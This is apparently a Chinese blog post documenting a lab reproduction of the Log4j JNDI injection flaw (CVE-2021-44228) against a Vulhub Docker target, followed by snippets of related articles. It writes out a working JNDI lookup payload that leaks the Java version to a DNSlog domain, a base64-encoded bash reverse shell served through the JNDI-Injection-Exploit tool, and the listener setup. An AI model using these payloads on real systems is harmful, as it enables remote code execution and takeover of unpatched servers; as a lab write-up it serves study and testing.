利用Vulhub复现log4j漏洞

已于 2022-04-27 22:30:03 修改
阅读量4.2k 收藏 5
点赞数 11
分类专栏: ctf 文章标签: 网络安全
于 2022-04-27 22:29:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_001/article/details/124461938
版权

Vulhub 搭建log4j漏洞环境,模拟攻击:

靶机:

首先进入log4j路径

cd vulhub/log4j/CVE-2021-44228/

搭建环境

sudo docker-compose build

sudo docker-compose  up -d

网址输入:http://127.0.0.1:8983/admin/cores

在DNSlog网站生成域名:jkvl0r.dnslog.cn

输入http://127.0.0.1:8983/admin/cores?action=${jndi:ldap://${sys:java.version}.jkvl0r.dnslog.cn}

可以看到:

可以看到Java的版本被输出,测试具有漏洞

攻击:

应用工具JNDI-Injection-Exploit搭建服务:格式:
 

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "命令" -A "ip(攻击机)"

 这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。

接下来要实现反弹shell,可以用命令

 bash -i >& /dev/tcp/192.168.237.128/6666 0>&1

注意“命令”必须经过编码,不然将无法实现

──(root💀KALI)-[/sda1/bugku/JNDI-Injection-Exploit/target]
└─# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNy4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.237.128"

得到结果:

 先打开控制端的监听:

┌──(root💀KALI)-[/]
└─# sudo nc -lvnp 6666                                                                                                                                                                                130 ⨯
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666

使用bp payload

 成功反弹shell:

榴莲 蛋挞
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[渗透测试笔记] 50.Log4j2漏洞复现(CVE-2021-44228)
H4ppyD0g的博客
03-17 2899
文章目录漏洞描述利用工具简单复现vulhub复现手动复现深入分析漏洞原理 漏洞描述 漏洞描述 Apache Log4j是Apache的一个开源项目,是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 Log4j2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用
ArcGIS漏洞修补工具(Log4J
01-18
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具
vulhub-log4j漏洞复现
m0_62008601的博客
07-27 1233
vulhub-log4j漏洞复现
VULHUB复现log4j反序列化漏洞-CVE-2021-44228
最新发布
carrot11223的博客
04-29 1091
下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143。bash编码一下:https://www.sqlsec.com/rce/
漏洞复现——Vulhup靶场-Log4j复现
qq_39289068的博客
05-06 240
log4j复现
vulhublog4j
haoaaao的博客
05-02 1305
0x00 CVE-2017-5645(反序列化) 1、介绍 ApacheLog4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用漏洞执行任意代码。 2、搭建 docker 3、复现 使用ysoserial生成payload,然后发送给your-ip:4712端口 java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-..
(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现
云舒的博客
07-21 971
log4j 反序列化、远程代码执行漏洞
LOG4J RCE 漏洞分享与自查.pdf
12-15
本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j RCE 漏洞是由于 Log4j2 2.10.0 版本中的 Lookup 模块存在的漏洞。Lookup 模块允许用户在日志格式字符串中插入变量,从而...
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)
qq_46145027的博客
05-10 3550
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。
vulhubapache log4j2(CVE-2021-44228)漏洞复现
weixin_48739941的博客
04-11 1346
(1)原理:Apache Log4j 2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。该漏洞一旦被攻击者利用会造成严重危害。 (2)cd vulhub/log4j/CVE-2021-44228 切换目录。 (3)docker-compose up -d 启动。 访问:http://
vulhub漏洞复现九_log4j/2
weixin_44193247的博客
01-11 1941
vulhub漏洞复现练习篇
vulhubLog4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2711
vulhubLog4j2:CVE-2021-44228漏洞复现
vulhub环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-14 7950
Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件,开发框架与Web应用中。Apache Log4j2组件中存在一个远程代码执行漏洞(CVE-2021-44832)。本文讲解如何搭建vulhub靶场并在vulhub环境中复现漏洞以及反弹shell的操作。
[~/vulhub]/log4j/CVE-2021-44228-20221225
32bin的博客
12-25 500
┌──(kwkl㉿kwkl)-[~/vulhub/log4j/CVE-2021-44228] └─$ cat docker-compose.yml version: ‘2’ services: solr: image: vulhub/solr:8.11.0 ports:┌──(kwkl㉿kwkl)-[~/vulhub/log4j/CVE-2021-44228] └─$http://localhost:8983/solr/#/~logginghttp://localhost:8983/solr/admin/c
利用Vulhub复现log4j漏洞CVE-2021-44228
plant1234的博客
10-02 748
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。可以利用http://www.dnslog.cn/ 申请一个dns域名进行检测。接下来要实现反弹shell,可以用命令。
log4j漏洞复现vulhub靶场
08-14
要在 Vulhub 靶场中复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值